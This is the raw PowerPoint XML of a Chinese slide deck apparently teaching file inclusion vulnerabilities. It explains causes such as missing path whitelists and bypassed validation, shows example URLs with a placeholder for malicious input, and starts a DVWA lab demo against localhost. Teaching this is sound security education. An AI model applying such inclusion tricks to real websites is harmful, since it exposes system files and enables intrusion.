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5"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId62"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="744" r:id="rId4"/>
    <p:sldId id="526" r:id="rId6"/>
    <p:sldId id="516" r:id="rId7"/>
    <p:sldId id="1183" r:id="rId8"/>
    <p:sldId id="1531" r:id="rId9"/>
    <p:sldId id="1532" r:id="rId10"/>
    <p:sldId id="1536" r:id="rId11"/>
    <p:sldId id="1537" r:id="rId12"/>
    <p:sldId id="1538" r:id="rId13"/>
    <p:sldId id="1539" r:id="rId14"/>
    <p:sldId id="1540" r:id="rId15"/>
    <p:sldId id="1582" r:id="rId16"/>
    <p:sldId id="1542" r:id="rId17"/>
    <p:sldId id="1543" r:id="rId18"/>
    <p:sldId id="1544" r:id="rId19"/>
    <p:sldId id="1545" r:id="rId20"/>
    <p:sldId id="1546" r:id="rId21"/>
    <p:sldId id="1547" r:id="rId22"/>
    <p:sldId id="1548" r:id="rId23"/>
    <p:sldId id="1549" r:id="rId24"/>
    <p:sldId id="1550" r:id="rId25"/>
    <p:sldId id="1584" r:id="rId26"/>
    <p:sldId id="1551" r:id="rId27"/>
    <p:sldId id="1552" r:id="rId28"/>
    <p:sldId id="1648" r:id="rId29"/>
    <p:sldId id="1553" r:id="rId30"/>
    <p:sldId id="1554" r:id="rId31"/>
    <p:sldId id="1555" r:id="rId32"/>
    <p:sldId id="1556" r:id="rId33"/>
    <p:sldId id="1557" r:id="rId34"/>
    <p:sldId id="1558" r:id="rId35"/>
    <p:sldId id="1559" r:id="rId36"/>
    <p:sldId id="1560" r:id="rId37"/>
    <p:sldId id="1649" r:id="rId38"/>
    <p:sldId id="1625" r:id="rId39"/>
    <p:sldId id="1561" r:id="rId40"/>
    <p:sldId id="1562" r:id="rId41"/>
    <p:sldId id="1563" r:id="rId42"/>
    <p:sldId id="1564" r:id="rId43"/>
    <p:sldId id="1565" r:id="rId44"/>
    <p:sldId id="1566" r:id="rId45"/>
    <p:sldId id="1567" r:id="rId46"/>
    <p:sldId id="1568" r:id="rId47"/>
    <p:sldId id="1569" r:id="rId48"/>
    <p:sldId id="1570" r:id="rId49"/>
    <p:sldId id="1571" r:id="rId50"/>
    <p:sldId id="1572" r:id="rId51"/>
    <p:sldId id="1573" r:id="rId52"/>
    <p:sldId id="1574" r:id="rId53"/>
    <p:sldId id="1576" r:id="rId54"/>
    <p:sldId id="1577" r:id="rId55"/>
    <p:sldId id="1578" r:id="rId56"/>
    <p:sldId id="1579" r:id="rId57"/>
    <p:sldId id="1580" r:id="rId58"/>
    <p:sldId id="1575" r:id="rId59"/>
    <p:sldId id="1581" r:id="rId60"/>
    <p:sldId id="413" r:id="rId61"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>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2" pos="7660" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="1" orient="horz" pos="2073" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="1" orient="horz" pos="16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文杰" initials="刘文杰" lastIdx="2" clrIdx="0"/>
  <p:cmAuthor id="2" name="Administrator" initials="A" lastIdx="4" clrIdx="1"/>
  <p:cmAuthor id="7" name="熊仪_aYju7RJj" initials="熊" lastIdx="0" clrIdx="0"/>
  <p:cmAuthor id="8" name="yifei" initials="y" lastIdx="1" clrIdx="7"/>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2823"/>
    <a:srgbClr val="FFC000"/>
    <a:srgbClr val="92D050"/>
    <a:srgbClr val="0162A7"/>
    <a:srgbClr val="ED7D31"/>
    <a:srgbClr val="A5A5A5"/>
    <a:srgbClr val="D9DADE"/>
    <a:srgbClr val="005D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6014" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="83" d="100"/>
          <a:sy n="83" d="100"/>
        </p:scale>
        <p:origin x="643" y="82"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="3840"/>
        <p:guide pos="7660"/>
        <p:guide orient="horz" pos="2073"/>
        <p:guide orient="horz" pos="168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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="tags/tag82.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D8DDD-29B3-4B15-844E-5C6F046154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C6FC-2464-488C-91EF-93AF87FFD96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image" Target="../media/image1.png"/><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4.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag33.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.pn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835" y="393065"/>
            <a:ext cx="6845935" cy="577215"/>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custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId5"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId11"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId12"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId13"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId14"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId15"/>
              </p:custDataLst>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custDataLst>
                <p:tags r:id="rId16"/>
              </p:custDataLst>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0" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId17"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="186296" y="318149"/>
            <a:ext cx="652329" cy="652329"/>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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{565CE74E-AB26-4998-AD42-012C4C1AD076}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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455"/>
            <a:ext cx="12192000" cy="6856286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9900032" y="6588850"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="173489" y="6130840"/>
            <a:ext cx="2152381" cy="447619"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11336682" y="6577698"/>
            <a:ext cx="576150" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="sq">
            <a:noFill/>
            <a:miter lim="800000"/>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kern="0" spc="27" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Arial Unicode MS" panose="020B0604020202020204" charset="-122"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1000" kern="0" spc="27" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Arial Unicode MS" panose="020B0604020202020204" charset="-122"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11916221" y="6696572"/>
            <a:ext cx="275779" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" cap="rnd" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="319648"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="13246" y="1122229"/>
            <a:ext cx="684000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" cap="rnd" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="015998"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710492" y="482139"/>
            <a:ext cx="3553937" cy="1003817"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="5000"/>
              </a:lnSpc>
              <a:defRPr sz="3600" b="0">
                <a:solidFill>
                  <a:srgbClr val="115FA8"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Content</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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单击此处编辑时间</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="灯片编号占位符 34"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme2.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag39.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random/>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0"/>
    </p:custData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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag42.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag66.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag65.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag64.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag63.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tags" Target="../tags/tag41.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide6.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><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sz="3600"/>
              <a:t>文件</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>包含漏洞</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2024</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>月</a:t>
            </a:r>
            <a:endParaRPr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文件包含漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>成因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78155" y="2640965"/>
            <a:ext cx="11372850" cy="1322070"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1"/>
              <a:t>缺乏文件路径限制：</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1"/>
              <a:t>    开发者没有对可以包含的文件进行白名单控制，或者没有使用绝对路径限制加载的范围。如果应用程序可以任意加载文件，就可能导致攻击者通过构造输入加载系统文件或其他敏感文件。</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1"/>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853690" y="2287905"/>
            <a:ext cx="6861810" cy="2122805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400">
                <a:ln w="22225">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400">
                <a:ln w="22225">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>没有合理地进行校验</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400">
              <a:ln w="22225">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400">
              <a:ln w="22225">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400">
                <a:ln w="22225">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400">
                <a:ln w="22225">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>被绕过</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400">
              <a:ln w="22225">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRP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4297680" cy="922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文件包含</a:t>
            </a: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示例</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示例（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>维基百科）</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108450" y="1275080"/>
            <a:ext cx="6862445" cy="5452110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651510" y="3311525"/>
            <a:ext cx="2999740" cy="301625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请先对代码进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>阅读</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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示例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2783840" y="2310130"/>
            <a:ext cx="7331710" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>http://yourdomain.com/index.php?language=english</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2783840" y="3108325"/>
            <a:ext cx="7905115" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>http://yourdomain.com/index.php?language=french</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1184910" y="2310130"/>
            <a:ext cx="1599565" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>对于英语</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1184275" y="3081655"/>
            <a:ext cx="1599565" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>对于法语</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196975" y="4008755"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>恶意构造</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2783840" y="3987165"/>
            <a:ext cx="8758555" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>http://yourdomain.com/index.php?language=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>恶意构造的代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>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示例说明</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569085" y="1182370"/>
            <a:ext cx="9584690" cy="5497195"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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示例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2-DVWA</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02235" y="1581785"/>
            <a:ext cx="6617335" cy="4399915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>靶场演示：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>根据我们的点击，显示正常的网页</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>http://127.0.0.1/dvwa/vulnerabilities/fi/?page=include.php</a:t>
            </a:r>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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>更改网站，查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>phpinfo</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
